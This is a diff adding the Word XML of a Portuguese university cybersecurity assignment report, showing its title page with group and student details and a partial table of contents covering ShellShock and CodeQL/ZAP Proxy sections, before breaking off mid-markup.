--- a/TP2/GN11_TP2.docx
+++ b/TP2/GN11_TP2.docx
@@ -4,6 +4,1472 @@
   <w:body>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Title"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Cibersegurança</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Subtitle"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Subtitle"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Subtitle"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rabalho do módulo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>2, parte 1 e 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Regime</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>: Noturno</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Grupo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>: G11</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Alunos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- Alexandre Silva </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>47192</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- Diogo Cunha </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>47109</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:sdt>
+      <w:sdtPr>
+        <w:id w:val="-724286656"/>
+        <w:docPartObj>
+          <w:docPartGallery w:val="Table of Contents"/>
+          <w:docPartUnique/>
+        </w:docPartObj>
+      </w:sdtPr>
+      <w:sdtEndPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="en-US"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
+      </w:sdtEndPr>
+      <w:sdtContent>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOCHeading"/>
+          </w:pPr>
+          <w:proofErr w:type="spellStart"/>
+          <w:r>
+            <w:t>Índice</w:t>
+          </w:r>
+          <w:proofErr w:type="spellEnd"/>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:hyperlink w:anchor="_Toc213009127" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>Introdução</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213009127 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="440"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213009128" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Parte 1- </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:i/>
+                <w:iCs/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>ShellShock</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213009128 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="960"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213009129" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>1.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>Inicialização do ambiente</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213009129 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="960"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213009130" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>1.2.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>Vulnerabilidade</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213009130 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="960"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213009131" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>1.3.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>Explorar a vulnerabilidade</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213009131 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="440"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213009132" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>Parte 2 – CodeQL e ZAP Proxy</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213009132 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="960"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213009133" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>A – CodeQL execução local</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213009133 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1200"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213009134" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.1.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>CodeQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213009134 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
